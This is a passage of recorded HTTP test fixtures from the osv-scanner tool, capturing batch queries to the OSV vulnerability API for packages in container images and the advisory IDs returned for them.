2 proto_minor: 0 content_length: 2685 body: | { "results": [ {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-13176", "modified": "2026-02-08T14:17:02.498117Z" }, { "id": "ALPINE-CVE-2024-2511", "modified": "2025-12-03T22:55:31.105344Z" }, { "id": "ALPINE-CVE-2024-4603", "modified": "2025-12-03T22:57:04.661877Z" }, { "id": "ALPINE-CVE-2024-4741", "modified": "2025-12-03T22:57:09.616922Z" }, { "id": "ALPINE-CVE-2024-5535", "modified": "2025-12-03T22:57:32.699825Z" }, { "id": "ALPINE-CVE-2024-6119", "modified": "2025-12-03T22:57:47.097001Z" }, { "id": "ALPINE-CVE-2024-9143", "modified": "2025-12-03T22:57:50.413061Z" }, { "id": "ALPINE-CVE-2025-9230", "modified": "2026-02-08T14:17:13.655545Z" }, { "id": "ALPINE-CVE-2025-9232", "modified": "2026-02-08T14:17:23.776473Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2023-42363", "modified": "2025-12-03T22:53:19.595031Z" }, { "id": "ALPINE-CVE-2023-42364", "modified": "2025-12-03T22:53:16.639859Z" }, { "id": "ALPINE-CVE-2023-42365", "modified": "2025-12-03T22:53:18.372883Z" }, { "id": "ALPINE-CVE-2023-42366", "modified": "2025-12-03T22:53:21.200830Z" }, { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {} ] } headers: Content-Length: - "2685" Content-Type: - application/json status: 200 OK code: 200 duration: 0s ================================================ FILE: cmd/osv-scanner/scan/image/testdata/cassettes/TestCommand_OCIImage_JSONFormat.yaml ================================================ --- version: 2 interactions: - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 14537 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "PyPI", "name": "django" }, "version": "1.11.29" }, { "package": { "ecosystem": "PyPI", "name": "flask" }, "version": "0.12.2" }, { "package": { "ecosystem": "PyPI", "name": "jinja2" }, "version": "3.1.6" }, { "package": { "ecosystem": "PyPI", "name": "markupsafe" }, "version": "3.0.3" }, { "package": { "ecosystem": "PyPI", "name": "werkzeug" }, "version": "3.1.4" }, { "package": { "ecosystem": "Debian:10", "name": "adduser" }, "version": "3.118" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "base-files" }, "version": "10.3+deb10u13" }, { "package": { "ecosystem": "Debian:10", "name": "base-passwd" }, "version": "3.5.46" }, { "package": { "ecosystem": "Debian:10", "name": "bash" }, "version": "5.0-4" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "1:2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ca-certificates" }, "version": "20200601~deb10u2" }, { "package": { "ecosystem": "PyPI", "name": "certifi" }, "version": "2025.11.12" }, { "package": { "ecosystem": "PyPI", "name": "chardet" }, "version": "3.0.4" }, { "package": { "ecosystem": "PyPI", "name": "click" }, "version": "8.1.8" }, { "package": { "ecosystem": "Debian:10", "name": "coreutils" }, "version": "8.30-3" }, { "package": { "ecosystem": "Debian:10", "name": "dash" }, "version": "0.5.10.2-5" }, { "package": { "ecosystem": "Debian:10", "name": "debconf" }, "version": "1.5.71+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debian-archive-keyring" }, "version": "2019.1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "debianutils" }, "version": "4.8.6.1" }, { "package": { "ecosystem": "Debian:10", "name": "diffutils" }, "version": "1:3.7-3" }, { "package": { "ecosystem": "Debian:10", "name": "dpkg" }, "version": "1.19.8" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "findutils" }, "version": "4.6.0+git+20190209-2" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "gnupg2" }, "version": "2.2.12-1+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "grep" }, "version": "3.3-1" }, { "package": { "ecosystem": "Debian:10", "name": "gzip" }, "version": "1.9-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "hostname" }, "version": "3.21" }, { "package": { "ecosystem": "PyPI", "name": "idna" }, "version": "2.7" }, { "package": { "ecosystem": "Debian:10", "name": "init-system-helpers" }, "version": "1.56+nmu1" }, { "package": { "ecosystem": "PyPI", "name": "itsdangerous" }, "version": "2.2.0" }, { "package": { "ecosystem": "Debian:10", "name": "acl" }, "version": "2.2.53-4" }, { "package": { "ecosystem": "Debian:10", "name": "apt" }, "version": "1.8.2.3" }, { "package": { "ecosystem": "Debian:10", "name": "attr" }, "version": "1:2.4.48-4" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "audit" }, "version": "1:2.8.4-3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "bzip2" }, "version": "1.0.6-9.2~deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "glibc" }, "version": "2.28-10+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "libcap-ng" }, "version": "0.7.9-2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "db5.3" }, "version": "5.3.28+dfsg1-0.5" }, { "package": { "ecosystem": "Debian:10", "name": "cdebconf" }, "version": "0.249" }, { "package": { "ecosystem": "Debian:10", "name": "expat" }, "version": "2.2.6-2+deb10u6" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libffi" }, "version": "3.2.1-9" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "1:8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "libgcrypt20" }, "version": "1.8.4-5+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gdbm" }, "version": "1.18.1-4" }, { "package": { "ecosystem": "Debian:10", "name": "gmp" }, "version": "2:6.1.2+dfsg-4+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "gnutls28" }, "version": "3.6.7-4+deb10u10" }, { "package": { "ecosystem": "Debian:10", "name": "libgpg-error" }, "version": "1.35-1" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "libidn2" }, "version": "2.0.5-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "lz4" }, "version": "1.8.3-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "xz-utils" }, "version": "5.2.4-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "nettle" }, "version": "3.4.1-1+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "p11-kit" }, "version": "0.23.15-2+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pam" }, "version": "1.3.1-5" }, { "package": { "ecosystem": "Debian:10", "name": "pcre3" }, "version": "2:8.39-12" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "Debian:10", "name": "libseccomp" }, "version": "2.3.3-4" }, { "package": { "ecosystem": "Debian:10", "name": "libselinux" }, "version": "2.8-1+b1" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsemanage" }, "version": "2.8-2" }, { "package": { "ecosystem": "Debian:10", "name": "libsepol" }, "version": "2.8-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "sqlite3" }, "version": "3.27.2-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "e2fsprogs" }, "version": "1.44.5-1+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "gcc-8" }, "version": "8.3.0-6" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libtasn1-6" }, "version": "4.13-3+deb10u1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "systemd" }, "version": "241-7~deb10u9" }, { "package": { "ecosystem": "Debian:10", "name": "libunistring" }, "version": "0.9.10-1" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "libzstd" }, "version": "1.3.8+dfsg-3+deb10u2" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "mawk" }, "version": "1.3.3-17+b3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "ncurses" }, "version": "6.1+20181013-2+deb10u3" }, { "package": { "ecosystem": "Debian:10", "name": "netbase" }, "version": "5.6" }, { "package": { "ecosystem": "Debian:10", "name": "openssl" }, "version": "1.1.1n-0+deb10u5" }, { "package": { "ecosystem": "Debian:10", "name": "shadow" }, "version": "1:4.5-1.1" }, { "package": { "ecosystem": "Debian:10", "name": "perl" }, "version": "5.28.1-6+deb10u1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pip" }, "version": "23.0.1" }, { "package": { "ecosystem": "PyPI", "name": "pytz" }, "version": "2025.2" }, { "package": { "ecosystem": "Debian:10", "name": "readline" }, "version": "7.0-5" }, { "package": { "ecosystem": "PyPI", "name": "requests" }, "version": "2.20.0" }, { "package": { "ecosystem": "Debian:10", "name": "sed" }, "version": "4.7-1" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "PyPI", "name": "setuptools" }, "version": "58.1.0" }, { "package": { "ecosystem": "Debian:10", "name": "sysvinit" }, "version": "2.93-8" }, { "package": { "ecosystem": "Debian:10", "name": "tar" }, "version": "1.30+dfsg-6" }, { "package": { "ecosystem": "Debian:10", "name": "tzdata" }, "version": "2021a-0+deb10u11" }, { "package": { "ecosystem": "PyPI", "name": "urllib3" }, "version": "1.24.3" }, { "package": { "ecosystem": "Debian:10", "name": "util-linux" }, "version": "2.33.1-0.1" }, { "package": { "ecosystem": "PyPI", "name": "wheel" }, "version": "0.40.0" }, { "package": { "ecosystem": "Debian:10", "name": "zlib" }, "version": "1:1.2.11.dfsg-1+deb10u2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/Scanning_python_image_with_some_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 6240 body: | { "results": [ { "vulns": [ { "id": "GHSA-68w8-qjq3-2gfm", "modified": "2024-09-20T15:46:52.557962Z" }, { "id": "GHSA-6w2r-r2m5-xq5w", "modified": "2026-02-04T04:00:06.061990Z" }, { "id": "GHSA-7xr5-9hcq-chf9", "modified": "2026-02-04T03:48:05.224740Z" }, { "id": "GHSA-8x94-hmjh-97hq", "modified": "2026-02-04T02:45:55.690257Z" }, { "id": "GHSA-frmv-pr5f-9mcr", "modified": "2025-11-27T09:10:30.649595Z" }, { "id": "GHSA-qw25-v68c-qjf3", "modified": "2026-02-04T04:08:30.303132Z" }, { "id": "GHSA-rrqc-c2jx-6jgv", "modified": "2024-10-30T19:23:59.139649Z" }, { "id": "PYSEC-2021-98", "modified": "2023-12-06T01:01:16.755410Z" } ] }, { "vulns": [ { "id": "GHSA-562c-5r94-xh97", "modified": "2025-02-21T05:29:40.872529Z" }, { "id": "GHSA-5wv5-4vpf-pj6m", "modified": "2024-09-20T21:24:25.140560Z" }, { "id": "GHSA-68rp-wp8r-4726", "modified": "2026-02-23T23:43:45.778179Z" }, { "id": "GHSA-m2qf-hxjv-5gpq", "modified": "2025-02-21T05:42:17.337040Z" }, { "id": "PYSEC-2018-66", "modified": "2023-11-08T03:59:39.887416Z" }, { "id": "PYSEC-2019-179", "modified": "2023-11-08T04:00:40.602062Z" }, { "id": "PYSEC-2023-62", "modified": "2023-11-08T04:12:28.231927Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-29vq-49wr-vm6x", "modified": "2026-02-23T23:43:27.690386Z" }, { "id": "GHSA-87hc-h4r5-73f7", "modified": "2026-02-04T03:18:07.993642Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3482-1", "modified": "2025-05-26T07:01:25.263124Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "GHSA-jjg7-2v4v-x38h", "modified": "2026-02-04T03:49:45.087439Z" }, { "id": "PYSEC-2024-60", "modified": "2024-07-11T17:42:33.704488Z" } ] }, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, { "vulns": [ { "id": "DLA-3807-1", "modified": "2026-03-09T01:21:14.798998Z" }, { "id": "DLA-3850-1", "modified": "2026-03-09T01:19:52.798152Z" } ] }, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3783-1", "modified": "2026-03-09T01:21:52.762023Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3660-1", "modified": "2026-03-09T02:10:14.556560Z" }, { "id": "DLA-3740-1", "modified": "2026-03-09T01:23:17.775568Z" } ] }, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3474-1", "modified": "2026-03-09T01:20:13.950328Z" } ] }, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, {}, {}, {}, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, { "vulns": [ { "id": "DLA-3586-1", "modified": "2026-03-09T01:19:25.252973Z" }, { "id": "DLA-3682-1", "modified": "2026-03-09T01:18:42.667623Z" } ] }, {}, { "vulns": [ { "id": "DLA-3530-1", "modified": "2026-03-09T01:19:28.929204Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, { "vulns": [ { "id": "GHSA-4xh5-x5gv-qwph", "modified": "2026-02-04T03:47:34.542520Z" }, { "id": "GHSA-6vgw-5pg2-w6jp", "modified": "2026-02-16T17:11:10.097207Z" }, { "id": "GHSA-mq26-g339-26xf", "modified": "2026-02-04T02:57:26.696931Z" }, { "id": "PYSEC-2023-228", "modified": "2023-12-06T01:03:17.199012Z" } ] }, {}, {}, { "vulns": [ { "id": "GHSA-9hjg-9r4m-mvj7", "modified": "2026-02-04T03:44:00.676479Z" }, { "id": "GHSA-9wx4-h78v-vm56", "modified": "2026-02-04T02:43:42.271895Z" }, { "id": "GHSA-j8r2-6x86-q33q", "modified": "2026-02-04T03:34:13.807518Z" }, { "id": "PYSEC-2023-74", "modified": "2023-11-08T04:12:35.436175Z" } ] }, {}, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, { "vulns": [ { "id": "GHSA-5rjg-fvgr-3xxf", "modified": "2026-02-05T09:18:37.263234Z" }, { "id": "GHSA-cx63-2mw6-8hw5", "modified": "2026-02-04T03:54:02.259111Z" }, { "id": "GHSA-r9hx-vwmv-q579", "modified": "2026-02-04T03:03:25.892107Z" }, { "id": "PYSEC-2022-43012", "modified": "2023-12-06T01:02:35.662444Z" }, { "id": "PYSEC-2025-49", "modified": "2025-06-13T06:59:23.470501Z" } ] }, {}, { "vulns": [ { "id": "DLA-3755-1", "modified": "2026-03-09T01:18:04.185679Z" } ] }, { "vulns": [ { "id": "DLA-3684-1", "modified": "2025-05-26T07:01:38.953691Z" }, { "id": "DLA-3788-1", "modified": "2025-05-26T07:01:46.700929Z" } ] }, { "vulns": [ { "id": "GHSA-2xpw-w6gg-jr37", "modified": "2026-02-04T02:36:12.983430Z" }, { "id": "GHSA-34jh-p97f-mpxf", "modified": "2026-02-04T03:37:44.850742Z" }, { "id": "GHSA-38jv-5279-wg99", "modified": "2026-02-04T03:51:36.162029Z" }, { "id": "GHSA-g4mx-q9vg-27p4", "modified": "2026-02-04T03:30:16.767903Z" }, { "id": "GHSA-gm62-xv2j-4w53", "modified": "2026-02-04T03:37:15.919661Z" }, { "id": "GHSA-pq67-6m6q-mj2v", "modified": "2026-02-04T04:38:01.163387Z" }, { "id": "GHSA-v845-jxx5-vc9f", "modified": "2026-02-04T02:58:30.152562Z" }, { "id": "GHSA-wqvq-5m8c-6g24", "modified": "2024-11-18T22:47:07.792720Z" }, { "id": "PYSEC-2020-148", "modified": "2023-11-08T04:03:14.251187Z" }, { "id": "PYSEC-2021-108", "modified": "2023-11-08T04:06:04.829992Z" }, { "id": "PYSEC-2023-192", "modified": "2023-11-08T04:13:33.452167Z" }, { "id": "PYSEC-2023-212", "modified": "2023-11-08T04:13:39.165450Z" } ] }, { "vulns": [ { "id": "DLA-3782-1", "modified": "2026-03-09T01:20:42.573872Z" } ] }, { "vulns": [ { "id": "GHSA-8rrh-rw8j-w5fx", "modified": "2026-02-04T03:06:55.268134Z" } ] }, {} ] } headers: Content-Length: - "6240" Content-Type: - application/json status: 200 OK code: 200 duration: 0s - request: proto: HTTP/1.1 proto_major: 1 proto_minor: 1 content_length: 6488 host: api.osv.dev body: | { "queries": [ { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-baselayout" }, "version": "3.7.0-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-baselayout" }, "version": "3.7.0-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-keys" }, "version": "2.5-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "alpine-base" }, "version": "3.22.2-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "apk-tools" }, "version": "2.14.9-r3" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "ca-certificates" }, "version": "20250911-r0" }, { "package": { "ecosystem": "crates.io", "name": "displaydoc" }, "version": "0.2.5" }, { "package": { "ecosystem": "crates.io", "name": "form_urlencoded" }, "version": "1.2.2" }, { "package": { "ecosystem": "crates.io", "name": "icu_collections" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_locale_core" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_normalizer" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_normalizer_data" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_properties" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_properties_data" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "icu_provider" }, "version": "2.1.1" }, { "package": { "ecosystem": "crates.io", "name": "idna" }, "version": "1.1.0" }, { "package": { "ecosystem": "crates.io", "name": "idna_adapter" }, "version": "1.2.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "apk-tools" }, "version": "2.14.9-r3" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "openssl" }, "version": "3.5.4-r0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "openssl" }, "version": "3.5.4-r0" }, { "package": { "ecosystem": "crates.io", "name": "litemap" }, "version": "0.8.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "musl" }, "version": "1.2.5-r10" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "musl" }, "version": "1.2.5-r10" }, { "package": { "ecosystem": "crates.io", "name": "percent-encoding" }, "version": "2.3.2" }, { "package": { "ecosystem": "crates.io", "name": "potential_utf" }, "version": "0.1.4" }, { "package": { "ecosystem": "crates.io", "name": "proc-macro2" }, "version": "1.0.103" }, { "package": { "ecosystem": "crates.io", "name": "quote" }, "version": "1.0.42" }, { "package": { "ecosystem": "crates.io", "name": "rust_novuln_deprecated" }, "version": "0.1.0" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "pax-utils" }, "version": "1.3.8-r1" }, { "package": { "ecosystem": "crates.io", "name": "smallvec" }, "version": "1.15.1" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "busybox" }, "version": "1.37.0-r19" }, { "package": { "ecosystem": "crates.io", "name": "stable_deref_trait" }, "version": "1.2.1" }, { "package": { "ecosystem": "crates.io", "name": "syn" }, "version": "2.0.111" }, { "package": { "ecosystem": "crates.io", "name": "synstructure" }, "version": "0.13.2" }, { "package": { "ecosystem": "crates.io", "name": "tinystr" }, "version": "0.8.2" }, { "package": { "ecosystem": "crates.io", "name": "unicode-ident" }, "version": "1.0.22" }, { "package": { "ecosystem": "crates.io", "name": "url" }, "version": "2.5.3" }, { "package": { "ecosystem": "crates.io", "name": "utf8_iter" }, "version": "1.0.4" }, { "package": { "ecosystem": "crates.io", "name": "writeable" }, "version": "0.6.2" }, { "package": { "ecosystem": "crates.io", "name": "yoke" }, "version": "0.8.1" }, { "package": { "ecosystem": "crates.io", "name": "yoke-derive" }, "version": "0.8.1" }, { "package": { "ecosystem": "crates.io", "name": "zerofrom" }, "version": "0.1.6" }, { "package": { "ecosystem": "crates.io", "name": "zerofrom-derive" }, "version": "0.1.6" }, { "package": { "ecosystem": "crates.io", "name": "zerotrie" }, "version": "0.2.3" }, { "package": { "ecosystem": "crates.io", "name": "zerovec" }, "version": "0.11.5" }, { "package": { "ecosystem": "crates.io", "name": "zerovec-derive" }, "version": "0.11.2" }, { "package": { "ecosystem": "Alpine:v3.22", "name": "zlib" }, "version": "1.3.1-r2" } ] } headers: Content-Type: - application/json X-Test-Name: - TestCommand_OCIImage_JSONFormat/scanning_image_with_deprecated_packages url: https://api.osv.dev/v1/querybatch method: POST response: proto: HTTP/2.0 proto_major: 2 proto_minor: 0 content_length: 2365 body: | { "results": [ {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2024-58251", "modified": "2025-12-03T22:57:45.619122Z" }, { "id": "ALPINE-CVE-2025-46394", "modified": "2025-12-03T22:59:20.065296Z" } ] }, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, { "vulns": [ { "id": "ALPINE-CVE-2025-11187", "modified": "2026-01-30T11:15:53.799925Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-15469", "modified": "2026-01-30T11:16:52.287694Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { "id": "ALPINE-CVE-2025-69419", "modified": "2026-02-08T14:17:23.481787Z" }, { "id": "ALPINE-CVE-2025-69420", "modified": "2026-02-08T14:17:16.244540Z" }, { "id": "ALPINE-CVE-2025-69421", "modified": "2026-02-08T14:17:06.852172Z" }, { "id": "ALPINE-CVE-2026-22795", "modified": "2026-02-08T14:17:23.817021Z" }, { "id": "ALPINE-CVE-2026-22796", "modified": "2026-02-08T14:17:23.708503Z" } ] }, { "vulns": [ { "id": "ALPINE-CVE-2025-11187", "modified": "2026-01-30T11:15:53.799925Z" }, { "id": "ALPINE-CVE-2025-15467", "modified": "2026-02-26T11:16:44.405477Z" }, { "id": "ALPINE-CVE-2025-15468", "modified": "2026-01-30T11:17:10.087231Z" }, { "id": "ALPINE-CVE-2025-15469", "modified": "2026-01-30T11:16:52.287694Z" }, { "id": "ALPINE-CVE-2025-66199", "modified": "2026-01-30T11:16:38.617961Z" }, { "id": "ALPINE-CVE-2025-68160", "modified": "2026-02-08T14:17:20.369697Z" }, { "id": "ALPINE-CVE-2025-69418", "modified": "2026-02-08T14:17:22.909725Z" }, { 